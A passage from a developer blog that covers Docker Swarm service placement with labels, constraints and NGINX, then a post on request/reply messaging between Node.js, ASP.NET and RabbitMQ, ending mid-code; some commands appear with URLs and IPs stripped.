83f6hk7nraat4ikews3tm9dgm * osboxes1  Ready   Active        Leader
# docker node ls -f "label=db"
ID                          HOSTNAME  STATUS  AVAILABILITY  MANAGER STATUS
897zy6vpbxzrvaif7sfq2rhe0   osboxes2  Ready   Active
# docker node ls -f "label=nginx"
ID                          HOSTNAME  STATUS  AVAILABILITY  MANAGER STATUS
002iev7q6mgdor0zbo897noay   osboxes4  Ready   Active
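The label/constraint mechanism can be illustrated with a small simulation. This Python sketch (the node names come from the example above; the filtering function is my own illustration, not Docker code) mimics what `docker node ls -f "label=..."` and `--constraint engine.labels.X==true` select:

```python
# In-memory model of the four hosts and their engine labels, as configured
# via the --label flags in docker.service above.
NODES = {
    "osboxes1": {"web": "true"},
    "osboxes2": {"db": "true"},
    "osboxes3": {"web": "true"},
    "osboxes4": {"nginx": "true"},
}

def eligible_nodes(constraint, nodes=NODES):
    """Return the node names satisfying a constraint such as
    'engine.labels.web==true' -- roughly the filtering Swarm's scheduler
    performs before placing a task."""
    key, _, wanted = constraint.removeprefix("engine.labels.").partition("==")
    return sorted(n for n, labels in nodes.items() if labels.get(key) == wanted)

print(eligible_nodes("engine.labels.web==true"))    # ['osboxes1', 'osboxes3']
print(eligible_nodes("engine.labels.db==true"))     # ['osboxes2']
print(eligible_nodes("engine.labels.nginx==true"))  # ['osboxes4']
```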

Perfect; that's the result I wanted. Having built the Docker images, I can now start installing them on the machines I choose:

    docker service create --replicas 1 --constraint engine.labels.db==true --name app1 -p 5001:5001 --network mynet sbraer/aspnetcorelinux:api2

Note the constraint and replicas parameters. If everything went well:

# docker service ps app1
ID                         NAME    IMAGE                        NODE      DESIRED STATE  CURRENT STATE           ERROR
0x6nbwrahtd1x7x31exal4sb8  app1.1  sbraer/aspnetcorelinux:api2  osboxes2  Running        Starting 7 seconds ago

Great, the service is up and running on the designated machine.

# docker service ls
ID            NAME  REPLICAS  IMAGE                        COMMAND
7studfb313f7  app1  1/1       sbraer/aspnetcorelinux:api2

This command confirms that only one instance of this web API was started (I used the --replicas 1 parameter). But this brings us back to the problem mentioned at the start of this post. In the case of the main web API, which must be installed on two machines, what happens if one of the two is shut down? Docker Swarm will install a copy of it on the remaining available machine (and on no machine that lacks the matching label and constraint definition). Let's install them:

    docker service create --replicas 2 --constraint engine.labels.web==true --name app0 -p 5000:5000 --network mynet sbraer/aspnetcorelinux:api1

And what if we didn't know how many machines are available for a given service?

    docker service create --replicas $(docker node ls -f "label=web" -q | wc -l) --constraint engine.labels.web==true --name app0 -p 5000:5000 --network mynet sbraer/aspnetcorelinux:api1

This makes things a bit easier but doesn't solve the main problem. To solve it for good, it's enough to dig through Docker Swarm's parameters and find --mode global. This parameter installs the Docker container on every machine available in the Docker Swarm network, but combined with the constraint clause it does so only on the designated machines:

    docker service create --mode global --constraint engine.labels.web==true --name app0 -p 5000:5000 --network mynet sbraer/aspnetcorelinux:api1

This way, Docker Swarm installs exactly one container instance per machine, with two useful consequences: first, if a machine is shut down, Swarm won't install useless duplicates; second, and far more useful, when load (or anything else) demands it, we just need to add machines to the network carrying the configuration label we want, and Docker Swarm will install additional containers on them completely on its own. Excellent!
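The difference between `--replicas N` and `--mode global` can also be sketched. This toy scheduler is my own illustration of the placement behavior described above, not Swarm internals, and the extra node `osboxes5` is hypothetical:

```python
def place_replicated(eligible, n):
    """--replicas n: schedule n tasks over the eligible nodes round-robin,
    so losing a node can stack two instances on the same machine."""
    return [eligible[i % len(eligible)] for i in range(n)]

def place_global(eligible):
    """--mode global: exactly one task per eligible node, no more, no less."""
    return list(eligible)

web_nodes = ["osboxes1", "osboxes3"]

# Both modes start out identically on the two web-labeled nodes...
assert place_replicated(web_nodes, 2) == place_global(web_nodes)

# ...but when osboxes3 goes down, replicated mode doubles up on osboxes1,
# while global mode simply keeps one instance on the surviving node.
print(place_replicated(["osboxes1"], 2))  # ['osboxes1', 'osboxes1']
print(place_global(["osboxes1"]))         # ['osboxes1']

# Adding a newly labeled machine grows a global service automatically.
print(place_global(web_nodes + ["osboxes5"]))
```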

Here is what happened with the previous command:

# docker service ps app0
ID                         NAME    IMAGE                        NODE      DESIRED STATE  CURRENT STATE            ERROR
9d0a7oms384cbli78a0vuwwre  app0.1  sbraer/aspnetcorelinux:api1  osboxes1  Running        Starting 36 seconds ago
04y5c35orviamoogaetedjh1i  app0.2  sbraer/aspnetcorelinux:api1  osboxes3  Running        Starting 35 seconds ago

Now that all the main services are started, I check that everything works on all the machines:

# curl localhost:5000/api/systeminfo
[{"guid":"883bc3f9-f636-45f6-a05b-f91a09f95b13","dateTime":"2016-12-10T12:30:33.797293+00:00"}]
# curl localhost:5000/api/systeminfoutc
[{"guid":"d5c3ea31-4049-48f3-bf53-152bd31f29dd","dateTimeUTC":"2016-12-10T12:31:08"}]

Finally, a few words about service accessibility in Docker. These are the possible cases:

• External client to a Docker service
• Docker to an external service
• Docker to Docker

The first case is the one used so far: from a browser or terminal we call a service exposed inside a Docker container. Here Docker must expose the ports of interest when started (5000 for the main API in these examples, 5001 for the UTC DateTime one), and to call it we just use the IP of any machine (if we're in Docker Swarm and the container is started as a service). The second case isn't covered in my examples because it's the simplest and poses no problems: if our API had needed a database such as SQL Server installed on an external server, the connection string would be the classic one and there would be no issues. The last case is the hardest to grasp at first; the rules are the same as in the first case, but using an IP would cause problems because each container lives as if it were on its own machine. The simplest solution is to use the service name, so that when a service is distributed via Swarm we don't have to worry about checking which machine runs it or whether that machine is up. In the configuration file of the systeminfoutc web API I defined the URL of the API to call:

    "AppSettings": { "DateTimeUrl": "http://app1:5001/api/DatetimeUTC" }

Every service started in Docker Swarm is visible to the other running containers; for more granular control, nothing prevents us from creating several Docker networks with specific access points and shares. In this case, I admit, my simple tests did not reveal any real advantage. Anyway, cutting it short: we've reached the point where we need to expose the web API, and only the web API, to the internet. This is where the machine that will run NGINX comes in. For those who don't know it, NGINX is a well-known web server/reverse proxy, widely used on the web for its performance. Its configuration is simple. In my case, to expose the two main APIs (which answer on port 5000), I'll use this configuration file (dotnet.conf):

worker_processes 1;

events {
    worker_connections 1024;
}

http {
    upstream web-app {
        server app0:5000;
    }

    server {
        listen 80;
        location / {
            proxy_pass http://web-app;
            proxy_http_version 1.1;
            proxy_set_header Upgrade $http_upgrade;
            proxy_set_header Connection keep-alive;
            proxy_set_header Host $host;
            proxy_cache_bypass $http_upgrade;
        }
    }
}

Note the definition of the service answering on port 5000: app0. This immediately tells you that I will run NGINX from Docker as well. I'll also build a dedicated container with this Dockerfile:

FROM nginx
COPY dotnet.conf /etc/nginx/nginx.conf
EXPOSE 80

Once the image is built, I can start it:

    docker service create --mode global --network mynet -p 80:80 --name nginx --constraint engine.labels.nginx==true sbraer/nginx

If everything works, I can now call the API with:

# curl localhost/api/systeminfo
[{"guid":"d5c3ea31-4049-48f3-bf53-152bd31f29dd","dateTime":"2016-12-10T12:37:54.555623+00:00"}]
# curl localhost/api/systeminfoutc
[{"guid":"883bc3f9-f636-45f6-a05b-f91a09f95b13","dateTimeUTC":"2016-12-10T12:38:01"}]

In the real world, you would now lock down the network so that it is reachable from the outside only on port 80 of the machine running NGINX, and repeat the test:

    # curl [{"guid":"d5c3ea31-4049-48f3-bf53-152bd31f29dd","dateTime":"2016-12-10T12:39:52.582317+00:00"}]

As a test, let's stop the internal service:

    docker service rm app1

New test:

    #curl [{"guid":"d5c3ea31-4049-48f3-bf53-152bd31f29dd","dateTimeUTC":"1970-01-01T00:00:00"}]

As written earlier about how services are reached from and within Docker, if we had wanted to install NGINX directly on a machine, the configuration file would have had to point directly to all the IPs exposing the web API:

upstream web-app {
    server;
    server;
}

In that case, adding more machines for this service would require manually editing this file, something that would not happen in the previous setup.
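The maintenance cost of the static-IP variant is easy to see if you imagine generating the upstream block programmatically. In this Python sketch (the helper function is mine, and the example IPs are placeholders, not the post's real addresses), every added backend means regenerating and redeploying the file, whereas the Swarm DNS form, `server app0:5000;`, never changes:

```python
def upstream_block(name, servers):
    """Render an nginx upstream block from an explicit backend list."""
    lines = [f"upstream {name} {{"]
    lines += [f"    server {s};" for s in servers]
    lines.append("}")
    return "\n".join(lines)

# Static-IP style: the file must be rewritten for every topology change.
print(upstream_block("web-app", ["10.0.0.15:5000", "10.0.0.17:5000"]))

# Swarm DNS style: one stable line, resolved by Docker's internal DNS
# to whichever nodes currently run the app0 service.
print(upstream_block("web-app", ["app0:5000"]))
```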

    Having come this far, a few important points. First of all, with the current version of Docker Swarm (1.12 and 1.13) it is not possible to deploy images built locally; images must come from a hub, official or otherwise (in my examples I uploaded all the Docker images to the official hub). Anyone who does not want to make their creations public (for whatever reason) can use hubs that also allow private images, or, more simply, can set up an in-house registry server without trouble (documentation here). Finally... what can I say? I know, I still have not mentioned the problems... The most annoying one? When instances of a service are distributed across several machines, there is no way to get the IP of, or directly reach, a specific instance of that service. It sounds minor, but it is a serious problem, because the system described so far works perfectly for services that can be scaled independently of one another, but not for services that need to be configured and linked together. What do I mean? If, as in the example above, I wanted to distribute a database across several machines with Docker Swarm, how would I go about configuring them as a cluster with replication?

    I confess I ran many experiments on this, but with the current version of Docker Swarm there is no automatic solution: either the database (or other service) is built for it, or there is little to be done. If I insist on using Docker Swarm, for every machine in the cluster for that database I have to build targeted images with differentiated configuration files. It works, but the applications that need access must then be given connection strings that allow multiple servers to be defined. The most humane solution I found is to use single Docker instances linked together with Consul, as seen here (which explains the reason for that post).

    And with that, 2016 is over too.


    Continue reading Docker Swarm e constraint in un mondo reale.

    (C) 2017 ASPItalia.com Network - All rights reserved

              ASP.NET and RabbitMQ (with a bit of Node.js)   

    I will try to be briefer. In the previous post I went on at length about the world of message brokers and microservices. I approached the topic with RabbitMQ, but everything I wrote applies to any other message broker; the advantage of the one I chose is that, being cross-platform, it can be used on any operating system or technology. I covered several usage patterns, starting with simple examples and going as far as overdoing it with quicksort via message broker. The simplest examples were based on a console application that, by populating a queue in RabbitMQ, allowed another console application to pick up that message and process it (display it and little else, in my examples). In the slightly more advanced examples, a console application sent a message requesting a more complex task (a mathematical calculation); this was picked up and processed by another console application which, this time, instead of displaying the result and ending the job, sent the reply back to the message broker, where it was then picked up by the first program to display the result. There... that's it... this is the crucial point. In the end this is what we want in 90% of our needs: one of our programs, or a page of one of our web applications, requests data that, once received, must be displayed.

    If in a console application this is trivial thanks to independent events waiting for the remote reply, how should we behave in a web application? Before getting to the crux of this post, a technological digression that introduces the topic. As written in the previous post, I first got interested in message brokers through Node.js. This fairly recent technology (2009) caught on quickly, partly thanks to performance superior to what was popular at the time (ASP.NET, PHP and so on). It has a peculiarity all of its own that set it apart from every other technology in use until then: its asynchronous nature. While the world was moving toward parallelism to exploit the power of machines, node.js reinvented the wheel and seemed to take a step backwards, since it is strictly single-threaded by nature. The difference is that all code must be written using asynchronous calls with callbacks. Remember ajax calls? Well, node.js pushes what we are used to on the client side onto the server side too: what we do to fetch the content of a remote call with ajax, we must also do to request data from a database, to invoke remote services, and so on. So how can node.js answer parallel requests and deliver such astonishing performance? Simply because, thanks to its single-threaded nature, it does not have to worry about locks and other multiprocessing issues; moreover, its asynchronous nature encourages, indeed forces, you not to write code that sits waiting for an external reply, wasting machine cycles and resources.
    Say one of our web pages written in node.js needs a database request to display a table: if two requests arrive almost in parallel, the single node.js thread starts processing the first page, issues the database request and, without waiting for the database reply, starts processing the second request, which will stop at its own database call. When the database returns the data, node.js resumes processing the first page and then the second. Add that on multicore machines we can trivially start several completely independent node.js processes in parallel, and it becomes clear what performance can be achieved. Remember the example from my previous post about fetching database tables from asp.net?

    var posts = BizEntity.GetPostList();
    var tags = BizEntity.GetTagList();

    In node.js it could be (using the promise pattern, the most popular approach in node.js):

    var postQuery = queryPosts();
    var tagsQuery = queryTags();
    Q.all([postQuery, tagsQuery]).then(function (results) {…});

    If my words have conveyed how node.js works, this shows why asp.net by comparison wastes, sorry, throws away resources pointlessly - luckily, with async/await the story has changed. After this mini node.js course for those completely new to it (the others will smile at how basic it is), let's see how simple it is to use rabbitmq from node.js to call a remote microservice - I repeat: it can be on the same machine or on the opposite side of the planet; what matters is that both can reach the same message broker.
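    To make the idea concrete, here is a minimal sketch of that pattern with standard promises (queryPosts and queryTags are hypothetical stand-ins for real database calls; I am only simulating their latency with timers):

```javascript
// Two async "queries" started together: the single thread is free while
// both wait, so the total wait is roughly the slower one, not the sum.
function queryPosts() {
    return new Promise(function (resolve) {
        setTimeout(function () { resolve(['post1', 'post2']); }, 50);
    });
}

function queryTags() {
    return new Promise(function (resolve) {
        setTimeout(function () { resolve(['tag1']); }, 50);
    });
}

function renderPage() {
    // plays the role of Q.all: wait for both results without blocking the thread
    return Promise.all([queryPosts(), queryTags()]).then(function (results) {
        return { posts: results[0], tags: results[1] };
    });
}
```

    Q.all in the snippet above does the same job; Promise.all is simply the built-in that later standardized what libraries like Q pioneered.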

    First of all, let's write a microservice in C# (as a console application) that, using RabbitMQ, creates a queue and an exchange that can be used to request the sum of two integers (if you don't know what a queue and an exchange are, reread the previous post).

    Here is the code:

    using RabbitMQ.Client;
    using System;
    using System.Text;
    using System.Threading;
    using System.Web.Script.Serialization;

    namespace MicroserviceAddiction
    {
        class Program
        {
            const string ExchangeName = "ExchangeIntegerAddition";
            const string QueueName = "QueueIntegerAddition";

            static void Main(string[] args)
            {
                var jsonSerializer = new JavaScriptSerializer();
                var connectionFactory = new ConnectionFactory();
                connectionFactory.HostName = "localhost";

                using (var Connection = connectionFactory.CreateConnection())
                {
                    var ModelCentralized = Connection.CreateModel();
                    ModelCentralized.QueueDeclare(QueueName, false, false, true, null);
                    ModelCentralized.ExchangeDeclare(ExchangeName, ExchangeType.Direct, false, true, null);
                    ModelCentralized.QueueBind(QueueName, ExchangeName, "");
                    // ModelCentralized.BasicQos(0, 1, false);

                    QueueingBasicConsumer consumer = new QueueingBasicConsumer(ModelCentralized);
                    string consumerTag = ModelCentralized.BasicConsume(QueueName, false, consumer);
                    Console.WriteLine("Wait incoming addition...");

                    while (true)
                    {
                        var e = (RabbitMQ.Client.Events.BasicDeliverEventArgs)consumer.Queue.Dequeue();
                        IBasicProperties props = e.BasicProperties;
                        string replyQueue = props.ReplyTo;
                        string correlationId = props.CorrelationId;
                        string messageId = props.MessageId ?? "";
                        string content = Encoding.Default.GetString(e.Body);
                        Console.WriteLine("> {0}", content);

                        var calculationObj = jsonSerializer.Deserialize<AdditionServiceClass>(content);
                        calculationObj.Total = calculationObj.Number1 + calculationObj.Number2;
                        var resultJSON = jsonSerializer.Serialize(calculationObj);
    #if(DEBUG)
                        Thread.Sleep(5000);
    #endif
                        Console.WriteLine("< {0}", resultJSON);

                        var msgRaw = Encoding.Default.GetBytes(resultJSON);
                        IBasicProperties basicProperties = ModelCentralized.CreateBasicProperties();
                        basicProperties.CorrelationId = correlationId;
                        basicProperties.MessageId = messageId;
                        ModelCentralized.BasicPublish("", replyQueue, basicProperties, msgRaw);
                        ModelCentralized.BasicAck(e.DeliveryTag, false);
                    }
                }
            }
        }
    }

    If you read the previous post you will recognize code used several times there. An exchange named "ExchangeIntegerAddition" is created, plus a queue from which the code takes the "AdditionServiceClass" object in JSON format and deserializes it so the code can handle the object natively:

    public class AdditionServiceClass
    {
        public int Number1 { get; set; }
        public int Number2 { get; set; }
        public int Total { get; set; }
    }

    Everything hinges on three lines of code:

    var calculationObj = jsonSerializer.Deserialize<AdditionServiceClass>(content);
    calculationObj.Total = calculationObj.Number1 + calculationObj.Number2;
    var resultJSON = jsonSerializer.Serialize(calculationObj);

    Having taken from the object sent by the message broker the replyQueue (the name of the queue to send the reply to) and the message references (MessageId and CorrelationId, used by the calling process to identify the reply), the response is sent in the way already covered. Done. For a topic we will get to shortly, I added, for debug builds only, a five-second sleep.

    Even though I have explained it already, I chose the JSON format because it gives me the interoperability that now lets me write a web application which, when its page is requested, will call this service and, once the reply is received, display it on screen. First we have to set things up with a few lines of code. With node.js and npm already installed on your machine (preferably recent versions), open a terminal, create a directory and configure the skeleton of our web application with the command:

    npm init

    Answering the various questions produces a package.json file like the following:

    {
      "name": "simpletest1",
      "version": "0.0.1",
      "description": "Simple example about comunication from nodejs to rabbitmq",
      "main": "index.js",
      "scripts": {
        "test": "echo \"Error: no test specified\" && exit 1"
      },
      "author": "AZ",
      "license": "ISC",
      "dependencies": {
        "amqplib": "^0.4.1",
        "express": "^4.13.4",
        "node-uuid": "^1.4.7"
      }
    }

    "dependencies" will initially be empty; from the terminal we type:

    npm install --save express
    npm install --save amqplib
    npm install --save node-uuid

    The npm commands install the dependencies we need... How strange: this procedure reminds me of something... ah yes, the one adopted by the new version of asp.net vnext. Sterile polemics aside, we now have everything we need. Let's write the skeleton of our web application:

    var express = require('express');
    var amqp = require('amqplib/callback_api');
    var uuid = require('node-uuid');

    var app = express();

    // code that waits on RabbitMQ goes here

    app.get('/', function (req, res) {
        // code
    });

    // Handle 404
    app.use(function(req, res) {
        res.status(404).send('404: Page not Found');
    });

    // Handle 500
    app.use(function(error, req, res, next) {
        res.status(500).send('500: Internal Server Error');
    });

    var server = app.listen(8001, function () {
        var host = server.address().address
        var port = server.address().port
        console.log("Example app listening at http://%s:%s", host, port)
    })

    The first three lines load the required dependencies. Express is used to simplify serving and routing our pages, amqplib to access the RabbitMQ message broker, node-uuid to create unique guids. Once the express app instance is created, we can define the routing rules. By defining a rule like the following:

    app.get('/', function (req, res) {
        // code
        // example to show a message
        res.end("Hello World!");
    });

    we ensure that, when our site is requested at the root path, the specified function is executed. Next come the routing rules for page not found (error 404) and for errors in our code (error 500). Finally, with "server" we actually start the server that processes the pages, on port 8001 in the example above. Once this web application is started with:

    node index.js

    and the page "http://localhost:8001" is requested from a browser, the function defined earlier in the routing is executed - and with the latest code, the "Hello World!" message is displayed. Time to add the code that talks to RabbitMQ. Here is how to send the request to our microservice that performs the calculation:

    app.get('/', function (req, res) {
        var objToRequest = {Number1:1, Number2:2};
        var stringToRequest = JSON.stringify(objToRequest);
        var guid = uuid.v4();
        console.log("********* Request: "+stringToRequest+" id: "+guid);
        ch.publish('ExchangeIntegerAddition', '', new Buffer(stringToRequest), {
            correlationId: guid,
            replyTo: q.queue
        });
        cacheRequest[guid] = res;
    });

    A JSON object is created with the numbers to add (note that it mirrors the AdditionServiceClass class in C#). After creating a guid to identify the call, a "ch" object is used (we will see in a moment how it is created) and a single function sends the message to the exchange where the microservice is listening, adding info about the reply queue and the call identifier. Finally, the node.js "res" object used to send the response is saved in a map keyed by the guid. Here is the power of node.js: thanks to its asynchronous nature we can store the response objects and use them whenever we want. In our case, when is that useful? Simple: when the microservice answers the request and sends the reply to our private queue dedicated to this purpose, we can display it. Here is the code:

    var ch, q;
    var cacheRequest = {};

    amqp.connect('amqp://localhost', function(err, conn) {
        if (err) {
            console.log("********************");
            console.log(err);
            console.log("Connection error!");
            return;
        }
        conn.createChannel(function(err, channel) {
            ch = channel;
            ch.assertQueue('', {exclusive: true, autoDelete: true}, function(err, queuex) {
                q = queuex;
                ch.consume(q.queue, function(msg) {
                    var guid = msg.properties.correlationId;
                    var objResult = JSON.parse(msg.content.toString());
                    console.log("From RabbitMQ");
                    var request = cacheRequest[guid];
                    cacheRequest[guid] = null;
                    request.end("Result sum (1+2): " + objResult.Total);
                }, {noAck: true});
            });
        });
    });

    The code is easy to follow: once a connection is opened, a channel is created along with a private queue that will be used to receive the replies (remember that a private queue can be read only by the process that created it, but anyone can post messages to it). Finally, the asynchronous function "ch.consume(...)" waits for messages from the queue. When one arrives, the call identifier (guid) is read from the message, the reply is read from its body (being JSON, everything becomes simpler), then the object connecting us to the client is retrieved from the cacheRequest map, and we finally send the response. With a few dozen lines of code we have everything we need: excellent.

    Before returning to the asp.net world, one more digression. Recall that a five-second delay was inserted into the C# microservice to simulate heavy processing and/or communication delays. What would happen if this page were requested several times? Each page would send its request to the message broker, which would forward it to the microservice, which in turn would answer, retracing the whole path backwards. Not very efficient: imagine this page (or this kind of request) being hit often! First approach to a fix: a cache. Nothing hard: when we receive the reply we store it, so subsequent requests get the answer directly. Here is the code (indexCache.js):

    var ch, q;
    var cacheRequest = {};
    var cacheResult = {};

    amqp.connect('amqp://localhost', function(err, conn) {
        if (err) {
            console.log("********************");
            console.log(err);
            console.log("Connection error!");
            return;
        }
        conn.createChannel(function(err, channel) {
            ch = channel;
            ch.assertQueue('', {exclusive: true, autoDelete: true}, function(err, queuex) {
                q = queuex;
                ch.consume(q.queue, function(msg) {
                    var guid = msg.properties.correlationId;
                    var stringToRequest = msg.properties.messageId;
                    var objResult = JSON.parse(msg.content.toString());
                    cacheResult[stringToRequest] = objResult;
                    console.log("From RabbitMQ");
                    var request = cacheRequest[guid];
                    cacheRequest[guid] = null;
                    request.end("Result sum (1+2): " + objResult.Total);
                }, {noAck: true});
            });
        });
    });

    ...

    app.get('/', function (req, res) {
        var objToRequest = {Number1:1, Number2:2};
        var stringToRequest = JSON.stringify(objToRequest);
        if (cacheResult[stringToRequest]) {
            console.log("From cache");
            return res.end("Result sum (1+2): " + cacheResult[stringToRequest].Total);
        }
        var guid = uuid.v4();
        console.log("********* Request: "+stringToRequest+" id: "+guid);
        ch.publish('ExchangeIntegerAddition', '', new Buffer(stringToRequest), {
            messageId: stringToRequest,
            correlationId: guid,
            replyTo: q.queue
        });
        cacheRequest[guid] = res;
    });

    A new cacheResult object stores the content of the reply. If we try it now, only the first request gets its answer after five seconds: all the following ones are immediate. Reason to be happy? No, because what happens between the first request and those arriving during the full five seconds before the reply? Simply, n requests travel the whole path until the answer lands in the cache. Simplified in a diagram:

    What if we buffered the requests so that, as soon as the reply arrives, we could send it to all the clients?

    The first user triggers the actual request to the microservice; if the following ones ask for the same data, they wait for the reply to the first request. With node.js? Still easy (indexbatch.js):

    var ch, q;
    var cacheRequest = {};

    amqp.connect('amqp://localhost', function(err, conn) {
        if (err) {
            console.log("********************");
            console.log(err);
            console.log("Connection error!");
            return;
        }
        conn.createChannel(function(err, channel) {
            ch = channel;
            ch.assertQueue('', {exclusive: true, autoDelete: true}, function(err, queuex) {
                q = queuex;
                ch.consume(q.queue, function(msg) {
                    var stringToRequest = msg.properties.correlationId;
                    var objResult = JSON.parse(msg.content.toString());
                    console.log("From RabbitMQ");
                    var requestList = cacheRequest[stringToRequest];
                    cacheRequest[stringToRequest] = null;
                    requestList.forEach(function(res) {
                        res.end("Result sum (1+2): " + objResult.Total);
                    });
                }, {noAck: true});
            });
        });
    });

    app.get('/', function (req, res) {
        var objToRequest = {Number1:1, Number2:2};
        var stringToRequest = JSON.stringify(objToRequest);
        console.log("********* Request: "+stringToRequest);
        if (!cacheRequest[stringToRequest]) {
            console.log("Request new");
            cacheRequest[stringToRequest] = [];
            ch.publish('ExchangeIntegerAddition', '', new Buffer(stringToRequest), {
                correlationId: stringToRequest,
                replyTo: q.queue
            });
        } else {
            console.log("Request cached");
        }
        cacheRequest[stringToRequest].push(res);
    });

    In requestList we store all the "identical" requests. When the reply arrives, we immediately send the responses to all the clients:

    requestList.forEach(function(res) {
        res.end("Result sum (1+2): " + objResult.Total);
    });

    If we open two different browsers (different tabs don't count) and request the page, the log messages in the terminal show that the first request is actually sent to the message broker while the second call waits; that it really works is easily verified by seeing both browsers refresh at the same time.
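    Stripped of the AMQP plumbing, this coalescing trick is just a map of in-flight promises. A sketch of the same idea (slowAdd stands in for the broker round trip; all names are mine):

```javascript
const inFlight = {};   // request key -> pending promise

function slowAdd(a, b) {
    // stands in for the slow trip through the broker to the microservice
    return new Promise(function (resolve) {
        setTimeout(function () { resolve(a + b); }, 50);
    });
}

function coalescedAdd(a, b) {
    const key = JSON.stringify({ Number1: a, Number2: b });
    if (!inFlight[key]) {
        // first caller actually issues the request...
        inFlight[key] = slowAdd(a, b).then(function (total) {
            delete inFlight[key];   // done: the next call starts fresh
            return total;
        });
    }
    // ...identical concurrent callers share the same pending promise
    return inFlight[key];
}
```

    Only the first caller pays the round trip; every identical request arriving in those five simulated seconds simply waits on the same promise.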

    End of the node.js digression. Now it's asp.net's turn. Easy, let's replicate the same behavior: cache the requests and, when the reply comes back from the message broker, display it... asp... something doesn't add up... pause... something in this reasoning doesn't work... In the end I realize that... IT CAN'T BE DONE! Asp.net, at least as far as my knowledge goes, allows nothing of the kind! So... how do I solve it? Ok, I'll keep it short... Let's recap, putting node.js out of our minds: asp.net is a different beast. I must arrange things so that, having sent a message to a message broker on page request, we wait for the reply before it is displayed.

    Nothing like that exists out of the box. We have to build something with what the .net framework gives us. I remember a native object I once used to distribute a queue among several threads: BlockingCollection. This object, in the System.Collections.Concurrent namespace, is part of a series of objects Microsoft created for safe access to collections under multithreading - the canonical List<>, Dictionary<> and so on, when used from multiple threads, require locks on the programmer's part. ConcurrentBag<>, ConcurrentDictionary<> and friends allow safe access without locks and work like the traditional objects:

    var queue1 = new System.Collections.Generic.Queue<string>();
    queue1.Enqueue("stringa");
    string value = queue1.Dequeue();

    This is the classic queue present in the .net Framework since generics arrived in version 2.0. After adding one or more strings we can take one out in classic FIFO order (first in, first out). If we use this object in a multithreaded environment we risk strange inconsistencies in the returned objects. With the new "concurrency-proof" objects we can write a slightly more complex example:

    var queueBlocked = new System.Collections.Concurrent.ConcurrentQueue<string>();
    queueBlocked.Enqueue("stringa1");
    while (true)
    {
        string value;
        if (queueBlocked.TryDequeue(out value))
        {
            Console.WriteLine(value);
        }
        else
        {
            break;
        }
    }

    Now we have to "try" to take the value: if it succeeds we can access the object safely, otherwise the queue is empty and the program exits. Beyond these basic objects, there is the one mentioned earlier: BlockingCollection.

    var queueBlocked = new System.Collections.Concurrent.BlockingCollection<string>();
    queueBlocked.Add("stringa1");
    while (true)
    {
        string value = queueBlocked.Take();
        Console.WriteLine(value);
    }

    This time the loop is infinite, but we need not worry: as soon as every element has been taken from the queue, the thread blocks, waiting for a second thread to add another element. It does so without wasting machine cycles: the thread is suspended until the next item arrives. In the past I used this object profitably to have several parallel threads process elements from a queue without worrying about locks and the like. What matters now, though, is that BlockingCollection offers me a possible solution. If I passed this object to a class (one that sends a message to the broker and waits for the reply) and then waited for it to be populated with the response, I would have a workable solution letting me write:

    protected void Page_Load(object sender, EventArgs e)
    {
        var objToRequest = new AdditionServiceClass { Number1 = 1, Number2 = 2 };
        var blockedObj = new BlockingCollection<AdditionServiceClass>();
        SendMessage(blockedObj); // <-- example
        msg.Text = blockedObj.Take().ToString(); // <-- simple example
    }

    A few tests show that it works, and well: my class (we'll see it later) that handles the messages sent to and received from the message broker can cache the requests while sending only one request to the microservice and, once the reply arrives, deliver it to all the waiting pages, which display the answer at the same time.
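    The blocking hand-off that BlockingCollection provides can also be sketched with promises (a toy analogue I wrote for illustration, not the .NET type): take() returns a promise that resolves as soon as someone add()s a value.

```javascript
// Toy async queue: take() "blocks" (as a promise) until add() supplies a value.
class AsyncQueue {
    constructor() {
        this.items = [];     // values waiting for a consumer
        this.waiters = [];   // consumers waiting for a value
    }
    add(value) {
        const waiter = this.waiters.shift();
        if (waiter) waiter(value);        // hand straight to a blocked take()
        else this.items.push(value);
    }
    take() {
        if (this.items.length > 0) return Promise.resolve(this.items.shift());
        return new Promise(resolve => this.waiters.push(resolve));
    }
}
```

    The design point is the same one the article is after: the consumer does not spin or hold a thread; it parks a continuation that the producer wakes up.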

    All good? No. From numerous tests, including my own, this object has a serious flaw: it does suspend the thread, but it does not free it for other requests, as you would want in an asp.net web application. And we are back to square one. What we need is an object that, like BlockingCollection, can block on an empty queue, yet is able to release the thread and, why not, is compatible with the new asynchronous asp.net model based on async/await. Rather than building it from scratch, I had already looked for such an object and found it in an external library: "AsyncEx"


    The object in question is "BufferBlock". Like ConcurrentQueue, we can use it in the same way:

    BufferBlock<string> bb = new BufferBlock<string>();
    string value;
    try
    {
        value = await bb.ReceiveAsync((new CancellationTokenSource(3000)).Token);
    }
    catch
    {
        value = "Timeout!!!";
    }

    We can also configure the CancellationTokenSource with a timeout: if no object is inserted within the allotted time, we get an exception we can handle, so that a page does not wait indefinitely for a reply that might never arrive.
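    The same timeout guard translates naturally to promises; a sketch (withTimeout is my helper name, not a library function):

```javascript
// Resolve with the reply if it arrives in time, otherwise reject, so a
// page never waits forever (mirrors the CancellationTokenSource idea).
function withTimeout(promise, ms) {
    let timer;
    const timeout = new Promise(function (resolve, reject) {
        timer = setTimeout(function () { reject(new Error('Timeout!!!')); }, ms);
    });
    return Promise.race([promise, timeout]).then(
        function (value) { clearTimeout(timer); return value; },
        function (err) { clearTimeout(timer); throw err; }
    );
}
```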

    In the end we made it: we have an object fit for the purpose and can write our page:

    <%@ Page Language="C#" AutoEventWireup="true" CodeBehind="TestRabbitMQ.aspx.cs" Inherits="AsyncPageTest.TestRabbitMQ" Async="true" %>
    Message from RabbitMQ:

    And the C# code:

    protected async void Page_Load(object sender, EventArgs e)
    {
        AdditionServiceClass value;
        var objToRequest = new AdditionServiceClass { Number1 = 5, Number2 = 2 };
        try
        {
            value = await RabbitUtilityClass.SendRequest(objToRequest);
            msg.Text = value.Total.ToString();
        }
        catch
        {
            msg.Text = "Timeout";
        }
    }

    The code is very simple: AdditionServiceClass has three properties holding the two numbers to add and the result. The interesting work is in the RabbitUtilityClass class. Here is the full code:

    public class RabbitUtilityClass
    {
        const string ExchangeName = "ExchangeIntegerAddition";

        static ConnectionFactory _connectionFactory;
        static IConnection _connection;
        static IModel _modelCentralized;
        static string _queueName;
        static ConcurrentDictionary<string, List<BufferBlock<AdditionServiceClass>>> _cacheRequest =
            new ConcurrentDictionary<string, List<BufferBlock<AdditionServiceClass>>>();
        static JavaScriptSerializer jsonSerializer = new JavaScriptSerializer();

        static RabbitUtilityClass()
        {
            _connectionFactory = new ConnectionFactory();
            _connectionFactory.HostName = "localhost";
            _connection = _connectionFactory.CreateConnection();
            _modelCentralized = _connection.CreateModel();
